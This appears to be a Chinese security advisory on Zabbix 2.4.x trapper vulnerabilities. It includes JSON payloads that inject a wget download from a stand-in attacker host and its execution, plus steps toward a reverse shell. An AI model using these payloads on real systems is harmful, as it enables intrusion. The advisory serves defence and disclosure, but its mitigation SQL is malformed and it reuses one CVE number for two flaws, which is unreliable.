關(guān)于Zabbix
zabbix是一個基于WEB界面的提供分布式系統(tǒng)監(jiān)視以及網(wǎng)絡(luò)監(jiān)視功能的企業(yè)級的開源解決方案。
zabbix能監(jiān)視各種網(wǎng)絡(luò)參數(shù),保證服務(wù)器系統(tǒng)的安全運(yùn)營;并提供靈活的通知機(jī)制以讓系統(tǒng)管理員快速定位/解決存在的各種問題。
漏洞描述
Zabbix Server Active Proxy Trapper 遠(yuǎn)程代碼執(zhí)行漏洞 (CVE-2017-2824)★★★★
Zabbix 2.4.x中的trapper command功能存在一處代碼執(zhí)行漏洞,特定的數(shù)據(jù)包可造成命令注入,進(jìn)而遠(yuǎn)程執(zhí)行代碼,攻擊者可以從一個Zabbix proxy 發(fā)起請求從而促發(fā)漏洞。
漏洞細(xì)節(jié)
該漏洞位于Zabbix中“Trapper”代碼部分,它的主要功能是允許Proxy和Server進(jìn)行通信的網(wǎng)絡(luò)服務(wù)(TCP端口10051)Zabbix Server提供了一組針對Zabbix Proxy的API調(diào)用,兩個將討論的是“discovery data”和“request command”。這些請求的示例數(shù)據(jù)如下所示:
'{"request":"command","scriptid":1,"hostid":10001}'
'{"request":"discovery data","host":"zabbix-proxy.com","clock":10,
"data":[{"clock":10,"drule":1,"dcheck2,"type":0,"ip:10.0.0.1, "dns":"zabbix-agent.com", port":10050,"key":"test","status":0,"value":"test_value"}]}
應(yīng)該注意的是,request命令調(diào)用位于Zabbix數(shù)據(jù)庫中的腳本,而不進(jìn)行任何身份驗(yàn)證。該漏洞的另一個關(guān)鍵方面是,默認(rèn)情況下,Zabbix 2.4.X使用腳本以下表中的3個腳本填充MySQL數(shù)據(jù)庫:
# scriptid == 1 == /bin/ping -c {HOST.CONN} 2>&1
# scriptid == 2 == /usr/bin/traceroute {HOST.CONN} 2>&1
# scriptid == 3 == sudo /usr/bin/nmap -O {HOST.CONN} 2>&1
問題在于,在調(diào)用腳本時,{HOST.CONN}字段實(shí)際上被host的IP地址替換。替換{HOST.CONN}的值位于Zabbixinterface表中,然后保存成VARCHAR(64)類型的“IP”字段。因此,如果攻擊者可以使用命令注入創(chuàng)建接口作為IP地址,并且通過“命令”請求的方式運(yùn)行{HOST.CONN}腳本,則將發(fā)生命令注入,并且可以獲得反向shell。
這個難題在于有效地將值插入到Zabbixhost表。默認(rèn)情況下,未經(jīng)身份驗(yàn)證的攻擊者無法做到這一點(diǎn),它需要系統(tǒng)管理員的一個次要配置,特別是關(guān)于Zabbix自動發(fā)現(xiàn)功能。
Zabbix自動發(fā)現(xiàn)和自動注冊功能允許根據(jù)Zabbix Proxy提供的Zabbix Server數(shù)據(jù)進(jìn)行Zabbix Server的配置。更具體地說,如果主機(jī)根據(jù)服務(wù)器的配置向Zabbix Proxy提供某些特性,則可能會采取某些操作,其中一個會使新發(fā)現(xiàn)的主機(jī)被添加到某些Zabbix數(shù)據(jù)庫表中。在這種情況下,主機(jī)將被插入到“host”表中,并且將創(chuàng)建一個入口到Zabbixinterface表中,主機(jī)提供的IP地址插入到IP列中,而不會對該IP地址的任何驗(yàn)證。
因此,通過使用合適的主機(jī)向服務(wù)器發(fā)送一個發(fā)現(xiàn)數(shù)據(jù)請求,可以將命令注入插入到數(shù)據(jù)庫中:
write_script_cmd='{
"request":"discoverydata",
"host":"zabbix-proxy.domain.fake",
"clock":148535399,
"data":[{
"clock":1485353070,
"drule":88,
"dcheck":174,
"type":0,
"ip":";wget -O/tmp/shttp://attacker-ip/s;#",
"dns":"host28.domain.fake",
"port":10050,
"key":"sectest",
"status":0,
"value":"lnxhost"
}]}'
由于ZabbixInterface表的ip字段的大小限制,第二個主機(jī)被插入到另一個IP地址的表中。
// Host 2
ip:/bin/bash /tmp/s;#
在這兩個主機(jī)被添加之后,仍然有一個問題,即不知道該hostid的command請求,但是這很容易解決了。暴力請求入數(shù)據(jù)庫,因?yàn)椴煌拿钫埱髸祷夭煌捻憫?yīng),確定主機(jī)是否存在,一旦存在的主機(jī)被確定,就可以直接調(diào)用它們,并且可以獲得反向的shell。命令請求如下所示
run_cmd = '{
"request":"command",
"scriptid":1,
"hostid":14666
}'
緩解措施
刪除Zabbix數(shù)據(jù)庫中的默認(rèn)腳本條目,可以直接操作數(shù)據(jù)庫刪除 sql 為: use zabbix; delete * from scripts; ,也可使用圖形界面刪除 (Administration->Scripts->Checkmarks->Delete Selected).
Zabbix Proxy 數(shù)據(jù)庫寫入漏洞(CVE-2017-2824)
Zabbix 2.4.x中的trapper功能存在一處數(shù)據(jù)庫寫漏洞,特定的惡意trapper數(shù)據(jù)包可通過database 的邏輯檢查,造成數(shù)據(jù)庫寫入,攻擊者可通過中間人的方式修改zabbix proxy 和 Server間的請求來觸發(fā)漏洞。
影響版本
Zabbix 2.4.7 - 2.4.8r1
參考
http://blog.talosintelligence.com/2017/04/zabbix-multiple-vulns.html
http://www.talosintelligence.com/reports/TALOS-2017-0325/
http://www.talosintelligence.com/reports/TALOS-2017-0326/
https://support.zabbix.com/browse/ZBX-12075
https://support.zabbix.com/browse/ZBX-12076
| 
